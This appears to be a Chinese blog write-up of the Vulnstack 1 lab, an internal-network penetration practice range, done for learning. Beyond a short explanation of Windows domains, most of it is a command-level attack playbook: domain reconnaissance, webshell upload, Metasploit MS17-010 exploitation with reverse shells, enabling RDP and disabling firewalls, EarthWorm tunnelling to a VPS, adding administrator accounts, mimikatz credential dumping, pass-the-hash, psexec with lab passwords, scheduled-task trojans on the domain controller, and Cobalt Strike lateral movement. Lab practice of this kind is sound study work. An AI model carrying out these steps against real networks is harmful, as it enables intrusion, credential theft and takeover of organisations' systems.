内网渗透靶场 Vulnstack（一）

虽然网上说这个靶场不是很难，但我自己做起来还是困难重重，很多知识不了解，msf与cs都搞了一下，搞了蛮久的，学到了不少，继续努力！！！

首先对内网域进行了解一下。

域是计算机网络的一种形式，其中所有用户帐户
，计算机，打印机和其他安全主体都在位于称为域控制器的一个或多个中央计算机集群上的中央数据库中注册。身份验证在域控制器上进行。
在域中使用计算机的每个人都会收到一个唯一的用户帐户，然后可以为该帐户分配对该域内资源的访问权限。从 Windows Server 2003
开始， Active Directory 是负责维护该中央数据库的 Windows 组件。Windows
域的概念与工作组的概念形成对比，在该工作组中，每台计算机都维护自己的安全主体数据库。

1、域控机可管理所有域用户。
2、域用户、域管理员可登陆到任何一台在域中的域成员主机，当然域成员想要登陆域控机的话，要设置允许才行。
3、域管理员可以更改任何域用户的密码。（自己的密码也可以改），因为是域，所以域管理员在域控机上修改密码，还是域成员主机上修改密码，都是可以的。
4、域用户是属于域，如果设置了允许，域用户也是可以登录到任何一台域成员主机和域控。
5、如下图：“域名\用户名”是登入域，“主机名\用户名”是登入本地计算机

在进行内网渗透的开始阶段，需要收集相关的域信息，下面是常用命令行ipconfig /all   查看本机ip，所在域route print     打印路由信息net view        查看局域网内其他主机名arp -a          查看arp缓存net start       查看开启了哪些服务net share       查看开启了哪些共享net share ipc$  开启ipc共享net share c$    开启c盘共享net use \\192.168.xx.xx\ipc$ "" /user:""   与192.168.xx.xx建立空连接net use \\192.168.xx.xx\c$ "密码" /user:"用户名"  建立c盘共享dir \\192.168.xx.xx\c$\user    查看192.168.xx.xx c盘user目录下的文件net config Workstation   查看计算机名、全名、用户名、系统版本、工作站、域、登录域net user                 查看本机用户列表net user /domain         查看域用户net localgroup administrators   查看本地管理员组（通常会有域用户）net view /domain         查看有几个域net user 用户名 /domain   获取指定域用户的信息net group /domain        查看域里面的工作组，查看把用户分了多少组（只能在域控上操作）net group 组名 /domain    查看域中某工作组net group "domain admins" /domain  查看域管理员的名字net group "domain computers" /domain  查看域中的其他主机名net group "doamin controllers" /domain  查看域控制器（可能有多台）

外网web渗透
phpmyadmin渗透的两种方法（一句话木马插入，日志写入），网站渗透（找到后台上传文件的地方，一句话连接蚁剑）

生成msf马后上传，回传shell后进行内网信息搜集
域关键信息（域名，域控（ping方法），域管理员，内网网段，）

完全控制即实现远程登陆，win7服务器的远程登陆：

netstat -ano | find "3389"    查看3389端口是否开启   REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f      //此命令打开3389端口   run post/windows/manage/enable_rdp  //关闭防火墙（有反弹shell的情况下即meterpreter，设置session）migrate //迁移进程（kiwi/mimikatz默认适用于x32的系统，需要迁移进程至x64）迁移进程后得到各主机密码，若kiwi无法获得管理员密码，上传mimikatz至服务器端（实战需免杀）提升权限：privilege：：debug  sekurlsa：：logonPasswords

横向移动

141的渗透到最终获取shell

shell中进行：chcp 65001(解决乱码问题)
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.52.%I | findstr “TTL=” （查询域内其他主机）
查找漏洞（本靶场是smb协议中出现的ms17-010）

 use auxiliary/scanner/smb/smb_ms17_010
options
set rhosts 192.168.52.141
run

添加路由：run autoroute -s 192.168.52.0/24或者输入自动路由
利用msf中的ms17-010爆破模块打开域成员（141）的3389端口
远程登陆：
对于主机的远程桌面，由于该主机处于内网，我们的攻击机相对之处于外网，无法直接与内网中的主机通信，所以我们需要用Earthworm做Socks5代理作为跳板进入内网获取更多主机。
添加一个转接隧道，监听1234，把本地1234端口收到的代理请求转交给1080端口，这里1234端口只是用于传输流量。

./ew_for_linux64 -s rcsocks -l 1080 -e 1234上传ew_for_Win.exe到win7受害主机，并在win7上面启动socks5服务器并反弹到vps上面ew_for_Win.exe -s rssocks -d 39.1xx.xx9.xx0 -e 1234添加sock5代理到proxychains.conf上即将攻击机的流量通过1234端口转接到sock5代理的1080端口，再在win7服务机上将流量通过1234端口传输到攻击机上，实现攻击机的伪装

msf上设置路由是为了让msf可以通信到内网其他主机；而我们设置代理是为了让攻击机上的其他工具可以通信到到内网的其他主机

扫描端口是否打开：proxychains4 nmap -p 3389 -Pn -sT 192.168.52.141
使用模块：auxiliary/admin/smb/ms17_010_command，设置命令打开3389端口，即可利用密码登陆。
先添加一个用户，然后使用 exploit/windows/smb/ms17_010_psexec 尝试去打一个shell回来，因为这个模块需要你去指定一个管理员用户。

添加用户：利用上面的msf ms17_010模块或者之前在蚁剑中添加

>  net user weizi 1234!@#$QWER /add
>  net localgroup administrators weizi
> /add net user weizi

用exploit/windows/smb/ms17_010_psexec打一个shell

域控shell获取(待实现)

3389老方法开启无效
通过win7在域控上面上传一个msf马
win7连接域控的c盘共享：net use \192.168.52.138\c$ “Liu78963” /user:“administrator”
使用dir 就可以查看域控的资源了。
将win7主机上的shell.exe上传到域控上
copy c:\phpstudy\www\yxcms\shell.exe \192.168.52.138\c$
设置一个任务计划，定时启动木马之后就能够获取域控的shell了

shell schtasks /create /tn "test" /tr C:\shell.exe /sc once /st    18:05 /S 192.168.52.138 /RU System  /u administrator /p "Liu78963"

总结：学到了搭建隧道，添加路由，以及一些msf命令的使用，猕猴桃的使用，对域有了一定的了解，后期对域成员以及域控的攻击手段。

msf永恒之蓝总结：

1、永恒之蓝扫描
background
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.52.141
exploit2、永恒之蓝利用use exploit/windows/smb/ms17_010_eternalblue
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
set LPORT 6667
set RHOST 192.168.52.141
exploit永恒之蓝利用3、永恒之蓝命令打开3389端口
use auxiliary/admin/smb/ms17_010_command
set RHOSTS 192.168.52.141
set command whoami
set COMMAND REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
exploit

3389端口的开启

如果3389开放，但是用防火墙：那么有3中方法突破（慢慢接触）

1、msf反弹shell，然后使用run post/windows/manage/enable_rdp，意思是防火墙允许远程桌面

2、msf反弹shell，命令行直接添加防火墙3389开放规则 netsh advfirewall firewall add rule
name=“Open 3389” dir=in action=allow protocol=TCP localport=3389

3、使用隧道：目标机有防火墙的话，我们是被目标机防火墙拦截的，但是目标机主动连接我们，防火墙是不会拦截的。
这里我们就开通一个隧道，也就是内网穿透，像frp，ngrok这些。

思考

SMB协议中MS17-010的了解：
SMB（全称是Server Message Block）是一个协议服务器信息块，它是一种客户机/服务器、请求/响应协议，通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源，电脑上的网上邻居就是靠SMB实现的；SMB协议工作在应用层和会话层，可以用在TCP/IP协议之上，SMB使用TCP139端口和TCP445端口。

MS17-010 是微软Windows 系统 SMB 协议的漏洞。由于某些请求的处理不当，Microsoft Server Message Block 1.0 （SMB v1 ）中存在多个远程代码执行漏洞，远程Windows主机受到漏洞的影响
PsExec 主要用于大批量 Windows 主机的维护，在域环境下效果尤其好，常用来提权，反弹shell

登陆域成员的方法：

smb扫描漏洞（ms17-010等等）
psexec登陆其他域控：内网中，最总要的还是域管理员账号，有了域管理员账号后，可以使用该域管理员账号密码利用psexec 登录域内任何一台开启了admin$共享(该共享默认开启) 的主机。

 psexec.exe \\10.37.129.7 -u god\administrator -p hongrisec@2019 cmd

3.域hash传递攻击

当获取到域管理员密码NTLM hash值时，可借助mimikatz进行进行登录域内其他电脑：
在msf中

use exploit/windows/smb/psexec
set rhosts 192.168.52.138
set smbuser administrator
set smbpass 00000000000000000000000000000000:b0093b0887bf1b515a90cf123bce7fba
set smbdomain god
run

shell中利用mimikatz，提前设置了隧道

sekurlsa::pth /user:administrator /domain:"god.org" /ntlm:c456c606a647ef44b646c44a227917a4

cs的运用
纯msf还是非常的繁琐，利用cs或者cs，msf结合更加的方便，需理解其中的道理。

使用cs得到msf的反弹shell：

添加一个监听器（类似msf中的handle）

在msf中反弹shell到cs

background
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost 192.168.1780100
set lport 8888
set session 1
run

cs即可上线

cs生成后门利用蚁剑上传服务器

攻击模块中生成木马利用蚁剑上传至服务器，运行
进入后修改睡眠时间为1，为了更方便，但是实际情况中这样会被发现。

开始提权：
设置一个监听器，利用exp提权，或者直接getuid，getsystem提权
成功提权
横向移动

先关闭服务器的防火墙

shell netsh firewall show state
shell netsh advfirewall set allprofiles state off

视图中查找目标

目标中三台域内主机，地址可能不准确的，但可以攻击
shell net view 查看域信息
hashdump得到密码

hashdump
logonpasswords

开始攻击域控
查看凭证

SMB Beacon 使用命名管道通过父级 Beacon 进行通讯，当两个 Beacons 链接后，子 Beacon 从父 Beacon
获取到任务并发送。因为链接的 Beacons 使用 Windows 命名管道进行通信，此流量封装在 SMB 协议中，所以 SMB
Beacon 相对隐蔽，绕防火墙时可能发挥奇效

增加smb监视器
拿下域控，同样方法拿下另一台域内主机
只需要更改攻击的信息为域控的会话

成功拿下所有主机权限

token盗取

除了直接使用获取到的 hash 值，也可以直接窃取 GOD\Administrator 的 token 来登录其他主机
一样的效果（借用了大佬的图）
这边是利用hash或者token获取权限，实战中可能获取不到，需要使用上面msf的攻击方法（141渗透）。

参考网站：
cs的运用与原理解释
精华总结
全程参考

内网渗透靶场 Vulnstack（一）相关推荐

CH4INRULZ_v1.0.1内网渗透靶场
nmap -T4 -A -p- 192.168.206.146 这里我们借助工具dirsearch对该网站进行目录扫描 http://192.168.206.146/development/ 然后再通 ...
记一次内网渗透测试实训总结
原文连接前言时间很快就来到了学期的最后一个月,和上学期一样,最后的几周是实训周,而这次实训恰好就是我比较喜欢的网络攻防,因为之前学过相关的知识,做过一些靶场,相比于其他同学做起来要快些,不过内网渗 ...
vulnstack内网渗透环境靶场-1 大全
一．搭建vulnstack靶场环境主要以真实企业环境为实例搭建一系列靶场,通过练习另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环,下载地址: http://vulnstack ...
内网安全：内网渗透.（拿到内网主机最高权限 vulntarget 靶场 A）
内网安全:内网渗透.(拿到内网主机最高权限) 内网穿透又被称为NAT穿透,内网端口映射外网,在处于使用了NAT设备的私有TCP/IP网络中的主机之间建立连接的问题.通过映射端口,让外网的电脑找到处于内 ...
三层网络靶场搭建MSF内网渗透
三层网络靶场搭建&MSF内网渗透在最近的CTF比赛中,综合靶场出现的次数越来越多,这种形式的靶场和真实的内网渗透很像,很贴合实际工作,但我们往往缺少多层网络的练习环境.本文通过VMware搭 ...
内网渗透|红日安全团队靶场渗透笔记|Mimikatz|MSF跳板
靶场下载:漏洞详情环境搭建: 文件下载下来有三个压缩包,分别对应域中三台主机: VM1对应win7是web服务器 VM2对应windows2003是域成员 VM3对应windows se ...
网络靶场实战-记一次大型内网渗透实践【一】
本场景是基于"火天网境攻防演训靶场"进行搭建,通过靶场内置的演训导调.演训裁判以及演训运维功能,可以对整个攻防演练过程进行管控和详尽的评估与复盘. 1.场景准备 · 场景名称某大 ...
内网渗透—红日安全vulnstack(二)
文章目录 1. 环境说明 2. 开启靶场 3. 外网渗透 3.1 端口扫描 3.2 拿shell 3.2.1 CVE-2019-2725 3.2.2 MSF17-010 3.3 提权 4. 内网渗透 ...
内网渗透之Msf-Socks代理实战（CFS三层靶场渗透过程及思路）
前言作者简介:不知名白帽,网络安全学习者. 博客主页:https://blog.csdn.net/m0_63127854?type=blog 内网渗透专栏:https://blog.csdn.net ...

内网渗透靶场 Vulnstack（一）

内网渗透靶场 Vulnstack（一）相关推荐

最新文章

热门文章